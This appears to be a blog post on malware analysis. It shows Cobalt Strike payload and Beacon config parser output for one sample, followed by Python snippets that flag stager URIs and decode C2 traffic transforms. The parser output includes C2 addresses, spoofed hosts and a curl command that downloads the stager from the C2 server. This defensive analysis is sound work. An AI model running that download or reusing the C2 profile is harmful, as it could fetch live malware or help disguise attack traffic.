🙇‍♀️🙇‍♀️🙇‍♀️ Thanks to jilvan from 安全豹 🙇‍♀️🙇‍♀️🙇‍♀️

for pointing me to this handy tool, cs_payload_parser.py

Avast - payload_tools

* Both of these extract from the payload (the stager), not from the Beacon.

cs_payload_parser.py

Extracts the configuration directly from the payload; supports DNS, SMB, TCP bind/reverse, and HTTP/HTTPS payloads.

cs_payload_extractor.py

Payload extractor and parser for payloads in various encodings: hex, hex_array, hex_veil, dec_array, chr_array, base64, xor, inflate, gzip

Example

Data

Input


Output


--------------------------------------------------------------------------------
CS Payload extractor v1.00 Avast Software s.r.o
--------------------------------------------------------------------------------
[*] Extracting file..
--------------------------------------------------------------------------------
Filename: 1
Payload type: raw_hex
--------------------------------------------------------------------------------
Saved as: 1_payload.bin
--------------------------------------------------------------------------------
[*] Parsing file..
--------------------------------------------------------------------------------
Filename: 1_payload.bin
--------------------------------------------------------------------------------
Architecture: x64
Payload type: HTTPS stager
Payload start: 0x0000
Customer ID: 0x01000000 | 16777216
--------------------------------------------------------------------------------
Request detail:
Address: 27.221.54.228
Port: 443
Query: /rand_jsidcode.csp?rnd=2623727 (invalid checksum)
--------------------------------------------------------------------------------
Request header:
Host: www.windowsupdate.com
Cookie: language=en_US; ENABLE_RANDCODE=1; VisitTimes=0; haveLogin=0;&TWFID=7c6e7d4a763f0168
Accept: */*
Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
--------------------------------------------------------------------------------
Curl download command:
curl -o download.bin -H "Host: www.windowsupdate.com" -H "Cookie: language=en_US; ENABLE_RANDCODE=1; VisitTimes=0; haveLogin=0;&TWFID=7c6e7d4a763f0168" -H "Accept: */*" -H "Insecure-Requests: 1" -H "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" https://27.221.54.228:443/rand_jsidcode.csp?rnd=2623727
--------------------------------------------------------------------------------
Payload API list:
Offset | Hash value | API name
0x00e9 | 0x0726774c | kernel32.dll_LoadLibraryA
0x0101 | 0xa779563a | wininet.dll_InternetOpenA
0x0123 | 0xc69f8957 | wininet.dll_InternetConnectA
0x0142 | 0x3b2e55eb | wininet.dll_HttpOpenRequestA
0x016c | 0x869e4675 | wininet.dll_InternetSetOptionA
0x0186 | 0x7b18062d | wininet.dll_HttpSendRequestA
0x032b | 0x56a2b5f0 | kernel32.dll_ExitProcess
0x0347 | 0xe553a458 | kernel32.dll_VirtualAlloc
0x0365 | 0xe2899612 | wininet.dll_InternetReadFile
--------------------------------------------------------------------------------
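The "(invalid checksum)" note next to the Query line refers to checksum8 of the stager URI path: the team server hands out the x86 stager when the path's byte sum mod 256 is 92 and the x64 stager when it is 93, so a URI that matches neither is flagged. The following is an added example, not part of the Avast tool; it assumes the sum is taken over the path without the leading slash or the query string, and the proxy-log lines are constructed:

```python
# Added example: checksum8 of a stager URI path, plus a scan over constructed
# proxy-log lines. 92 -> x86 stager, 93 -> x64 stager; anything else is what the
# Avast parser reports as "(invalid checksum)".
CHECKSUM8_X86 = 92
CHECKSUM8_X64 = 93

def checksum8(path: str) -> int:
    """Byte sum of the path modulo 256, leading '/' and query string excluded
    (assumption: this is the portion the check is taken over)."""
    path = path.split("?", 1)[0].lstrip("/")
    return sum(path.encode()) % 256

def classify_uri(path: str) -> str:
    c = checksum8(path)
    if c == CHECKSUM8_X86:
        return "x86 stager"
    if c == CHECKSUM8_X64:
        return "x64 stager"
    return "invalid checksum"

# Constructed proxy-log lines: client, host, path. The first path is the one
# from the parser output above; the other two were built to sum to 92 and 93.
PROXY_LOG = [
    "10.0.0.5 www.windowsupdate.com /rand_jsidcode.csp?rnd=2623727",
    "10.0.0.7 cdn.example /aaa9",
    "10.0.0.9 cdn.example /aaa:",
]

def stager_hits(lines):
    """Return (host, path, verdict) for each line whose path checksums to a
    stager value; short random-looking paths scoring 92/93 merit a closer look."""
    hits = []
    for line in lines:
        _, host, path = line.split()
        verdict = classify_uri(path)
        if verdict != "invalid checksum":
            hits.append((host, path, verdict))
    return hits
```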

Sentinel-One - CobaltStrikeParser

This one probably gives fuller information, since it parses the Beacon file directly:

parse_beacon_config.py [Beacon]

Without separators it looks a bit ugly 😑😑😑; redirecting the output to a file makes it slightly easier on the eyes:

parse_beacon_config.py [Beacon] > [config]


BeaconType - HTTPS
Port - 443
SleepTime - 1000
MaxGetSize - 1398119
Jitter - 10
MaxDNS - Not Found
PublicKey_MD5 - 512618433b3877f918760fd7040cdb16
C2Server - pypi.python.org,/latest/pip-check
UserAgent - Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
HttpPostUri - /latest/check
Malleable_C2_Instructions - Remove 2 bytes from the end
    Remove 10 bytes from the beginning
    Remove 0 bytes from the beginning
    Base64 URL-safe decode
    XOR mask w/ random key
HttpGet_Metadata - ConstHeaders
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: http://www.python.org/
        Accept-Encoding: gzip, deflate
    Metadata
        base64url
        prepend "__utmz="
        header "Cookie"
HttpPost_Metadata - ConstHeaders
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: http://www.python.org/
        Accept-Encoding: gzip, deflate
    SessionId
        mask
        base64url
        parameter "__utmz"
    Output
        mask
        base64url
        print
PipeName - Not Found
DNS_Idle - Not Found
DNS_Sleep - Not Found
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
SSH_Banner - Host: pypi15-python.org
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\dllhost.exe
Spawnto_x64 - %windir%\sysnative\dllhost.exe
CryptoScheme - 0
Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark - 426352781
bStageCleanup - False
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - True
bProcInject_UseRWX - True
bProcInject_MinAllocSize - 0
ProcInject_PrependAppend_x86 - Empty
ProcInject_PrependAppend_x64 - Empty
ProcInject_Execute - CreateThread
    SetThreadContext
    CreateRemoteThread
    RtlCreateUserThread
ProcInject_AllocationMethod - VirtualAllocEx
bUsesCookies - True
HostHeader - Host: pypi15-python.org
headersToRemove - Not Found
DNS_Beaconing - Not Found
DNS_get_TypeA - Not Found
DNS_get_TypeAAAA - Not Found
DNS_get_TypeTXT - Not Found
DNS_put_metadata - Not Found
DNS_put_output - Not Found
DNS_resolver - Not Found
DNS_strategy - round-robin
DNS_strategy_rotate_seconds - -1
DNS_strategy_fail_x - -1
DNS_strategy_fail_seconds - -1
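The Malleable_C2_Instructions and HttpGet_Metadata entries above are the transform chains this Beacon applies to a server response and to its own check-in metadata. The Python below is an added example (not CobaltStrikeParser code) that reverses exactly those chains on a captured response body and Cookie header, which is what you need when reconstructing this Beacon's traffic from a pcap; it assumes the mask layout is a 4-byte key followed by the XORed data, and the sample response is constructed:

```python
import base64

# Transform chain as CobaltStrikeParser printed it for this Beacon, in the
# order the Beacon applies it to an http-get server response.
INSTRUCTIONS = [("remove_end", 2), ("remove_begin", 10), ("remove_begin", 0),
                ("base64url", 0), ("mask", 0)]

def b64url_decode(data: bytes) -> bytes:
    # Restore padding in case the transform stripped it.
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))

def unmask(data: bytes) -> bytes:
    """'XOR mask w/ random key': assumed layout is a 4-byte key followed by
    the data, each data byte XORed with key[i % 4]."""
    key, body = data[:4], data[4:]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))

def decode_response(body: bytes, instructions=INSTRUCTIONS) -> bytes:
    """Undo the profile's output transforms. The result is still the
    encrypted task blob, not plaintext; only the encoding layer is removed."""
    for op, n in instructions:
        if op == "remove_end":
            body = body[:len(body) - n]
        elif op == "remove_begin":
            body = body[n:]
        elif op == "base64url":
            body = b64url_decode(body)
        elif op == "mask":
            body = unmask(body)
        else:
            raise ValueError(f"unknown transform: {op}")
    return body

def decode_get_metadata(cookie_header: str) -> bytes:
    """HttpGet_Metadata: base64url -> prepend "__utmz=" -> header "Cookie".
    Reversed for a captured Cookie header; yields the (still encrypted) metadata."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "__utmz":
            return b64url_decode(value.encode())
    raise ValueError("no __utmz cookie present")

def build_sample_response(task: bytes, key: bytes = b"\x11\x22\x33\x44") -> bytes:
    """Constructed response for this profile (demo input only): mask, base64url,
    then the 10-byte prefix and 2-byte suffix the Beacon strips."""
    masked = key + bytes(b ^ key[i % 4] for i, b in enumerate(task))
    return b"<!-- tsk: " + base64.urlsafe_b64encode(masked) + b"\r\n"
```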